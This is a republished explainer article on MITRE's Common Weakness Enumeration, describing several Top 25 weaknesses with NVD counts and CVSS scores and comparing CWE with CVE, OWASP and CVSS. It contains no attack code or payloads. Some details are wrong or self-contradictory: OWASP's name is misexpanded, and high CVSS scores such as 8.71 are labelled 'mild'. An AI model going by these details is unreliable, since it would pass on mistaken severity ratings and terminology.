With data and network security being a major concern for modern software development, several frameworks and guidelines have been developed to administer secure systems. The Common Weakness Enumeration (CWE) database is a community-developed project that provides a catalog of common vulnerabilities in the software and hardware of an organization’s tech stack. The database includes detailed descriptions of common weaknesses and guides secure coding standards.
This article delves into a common weakness enumeration, some of its prominent vulnerabilities, and commonly asked questions.
What is Common Weakness Enumeration?
The common weakness enumeration (CWE) database lists cyber vulnerabilities for any hardware or software product. The CWE identifies and categorizes the vulnerability type, security issues associated with the vulnerability, and the possible prevention efforts to address detected security vulnerabilities.
Supported by Mitre, CWE is a community-developed catalog that enforces a data-driven approach to cyber security. Security teams typically rely on the CWE’s catalog of software weaknesses as input for secure coding practices and designing the vulnerability management program. CWE is also considered crucial for managing the risks of a cyber supply chain, as it can be used to identify and address potential security vulnerabilities within third-party components of an enterprise network.
What is a CWE Vulnerability?
CWE vulnerabilities are software and hardware systems flaws that lead to security issues if left unattended. The CWE database categorizes over 600 class and base-level weaknesses, with the most severe types listed under CWE Top 25. The database lists vulnerabilities along with their impacts, helps organizations understand the attack surface, and identifies approaches to harden underlying systems.
Common Weakness Enumeration Examples
A few common security vulnerability types in the CWE list include:
Out-of-Bounds Write (CWE-787)
This security weakness arises when the application writes data outside the boundaries of an intended input buffer. The weakness may also be caused when the application executes pointer arithmetic or alters an index to reference a location outside the memory buffer. This memory corruption often leads to unintended code execution, a crash, or corruption of data.
The out-of-bounds write vulnerability is highly likely to be exploited, with a National Vulnerability Database (NVD) count of 3033. The severity of an attack is also high, with an average Common Vulnerability Scoring System (CVSS) score of 8.22 and an overall security score of 65.93.
Out-of-Bounds Read (CWE-125)
The CWE-125 vulnerability arises when the application can read data outside the boundaries of the intended output buffer. Adversaries can read sensitive information from out-of-bounds memory to obtain secret values that can be used to bypass authentication mechanisms and exploit other weaknesses for further reach.
The vulnerability can also lead to a memory buffer overflow, segmentation faults, and even a system crash. This potentially occurs when the application reads variable data values assuming that a process exists to terminate the read operation outside the stated buffer memory.
The CWE-125 weakness is a moderately severe attack vector with a CVSS score of 6.94, an NVD count of 1448, and an overall security score of 24.9.
Improper Neutralization of Input (CWE-79)
Also known as Cross-Site Scripting (XSS), this vulnerability occurs when an adversary can inject malicious code into websites, typically using browser-side scripts. The weakness is common in applications that accept untrusted data in a dynamically generated web page without proper neutralization. In such instances, the malicious script/data is used to perform adverse actions such as transferring sensitive data or sending abnormal HTTP requests within the web server’s security context.
The CWE-79 vulnerability has a high likelihood of exploitation, with an NVD count of 3564. The severity of such an attack is medium, with the weakness garnering an average CVSS score of 5.8 and an overall CWE security score of 46.84.
Improper Input Validation (CWE-20)
The CWE-20 weakness occurs in applications that accept input data but do not validate appropriately whether the supplied input has the properties required for secure processing. When the application receives an altered control flow path, an attacker can craft unexpected inputs that access a limited resource or remote code execution. Input validation weaknesses typically occur due to flaws in implementing architectural concepts in the SDLC or adopting development best practices.
The severity of the improper input validation flaws in software is mild, with an average CVSS score of 7.25. The likelihood of exploitability is medium, with an NVD count of 1120 and an overall security score of 20.47.
Improper Neutralization of Special Elements (CWE-78)
The CWE-78 vulnerability occurs in software applications that construct a portion or an entire OS command using external input supplied from an upstream component. This vulnerability, also known as OS command injection, is active when the application does not neutralize elements present in the input that could modify the command when sent to the intended downstream component.
The CWE 78 vulnerability allows attackers to execute commands directly on the operating system without having direct access to the platform. Since an attacker can abuse privileged programs to obtain permissions and specify commands rendered inaccessible by default, OS command injection often leads to improper privilege management.
OS command injection is a moderate vulnerability with an NVD count of 833. The severity of attacks targeting the CWE-78 vulnerability is mild, with an average CVSS score of 8.71 and an overall security score of 19.55.
Additional weaknesses on the CWE top 25 lists that range from high to medium severity include:
1. Improper neutralization of unique elements used in SQL command/SQL injection – (CWE-89)
2. Use after free – (CWE-416)
3. Improper restrictions of operations within the bounds of a memory transfer – (CWE-119)
4. Deserialization of untrusted data – (CWE-502)
5. Improper authentication – (CWE-287)
6. Cross-site request forgery – (CWE-352)
7. Missing authorization – (CWE-862)
8. Shared Resource with Improper Synchronization (‘Race Condition’) – (CWE-362)
9. Improper neutralization of elements used in a command (‘command injection’) (CWE-77)
What is the difference between CWE, CVE, and OWASP?
The Common Weakness Enumeration (CWE), Common Vulnerabilities & Exposures (CVE), and Online Web Application Security Project (OWASP) – all of these offer guidelines to security researchers on secure coding practices.
CVE is a list of known cyber security vulnerabilities and potential exposures of company resources.
OWASP is a community initiative that lists the Top 10 vulnerabilities – a list of the most dangerous software weaknesses and vulnerabilities affecting web applications.
CWE is a complete weakness database that provides a baseline for weakness identification and remediation of software and hardware-based security of an organization’s tech stack. CWE relies on CVE and OWASP data to identify and categorize the most impactful security vulnerabilities, their exploit likelihood, impacts, and preventive measures.
What purpose do CWE and CVSS solve?
Common Weakness and Enumeration (CWE) and Common Vulnerability Scoring System (CVSS) both facilitate a common understanding of all software weaknesses, ease of exploitation, and the potential impact of a successful exploit.
CWE aims to help organizations better address vulnerabilities by categorizing all identified weaknesses and exposures. CVSS, on the other hand, provides an evaluation of why a particular vulnerability is assigned with a detailed severity in terms of critical, high, medium, or low. CVSS also rates the weaknesses by providing them with a numerical score between 0.0 to 10.0.
This article has already been published on https://crashtest-security.com/common-weakness-enumeration/ and has been authorized by Crashtest Security for a republish.
Featured Image Courtesy – Photo by Desola Lanre-Ologun on Unsplash
Sudip is a Norwich, UK based Technical Writer who writes content on Cloud, DevOps and Cyber Security. He possesses more than 15 years of working experience as a Solution Architect in IT Infrastructure, and is an avid traveler and follower of sports.